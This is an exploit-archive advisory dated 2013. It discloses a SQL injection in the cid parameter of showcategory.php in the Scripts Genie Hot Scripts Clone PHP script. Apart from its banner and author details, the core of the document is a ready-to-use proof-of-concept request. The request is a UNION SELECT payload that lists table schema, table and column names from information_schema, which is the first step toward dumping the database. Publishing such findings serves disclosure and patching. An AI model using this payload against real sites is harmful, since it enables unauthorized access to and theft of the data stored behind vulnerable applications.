[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Scripts Genie Hot Scripts Clone (showcategory.php, cid param) - SQL Injection Vulnerability
# Published : 2013-02-18
# Author :
# Previous Title : Cometchat Application - Multiple Vulnerabilities
# Next Title : Cometchat - Multiple Vulnerabilities
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ Security Flaw +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=-
+ __ _ +
+ ___ ___ ___ _ _ / ___| |_ +
+/ __|/ _ / __| | | |/ / / _ __| +
+__ __/ (__| |_| / / / __/ |_ +
+|___/___|___|__,__ / ___|__| +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-+
+Scripts Genie Hot Scripts Clone Script+
+ SQL Injection Vulnerability PoC +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+=+
+ Discovered by Easy Laster +
+ Autor : Easy Laster +
+ Date :17.02.2013 +
+ Script:Scripts Genie +
+ Hot Scripts Clone Script +
+ scriptsgenie.com +
+ Price ::$1.75 +
+ Language: PHP +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Vulnerability +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+hutscripts/showcategory.php?cid=[SQLi]+
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
+ Proof of Concept +
+ Crawling the MYSQL Stack +
-+=--+=--+=--+=--+=--+=--+=--+=--+=--+-=
/hutscripts/showcategory.php?cid=21+uni
on+select+1,concat_ws(0x3a,table_schema
,table_name,column_name),3,4,5+from+inf
ormation_schema.columns+limit+180,1--+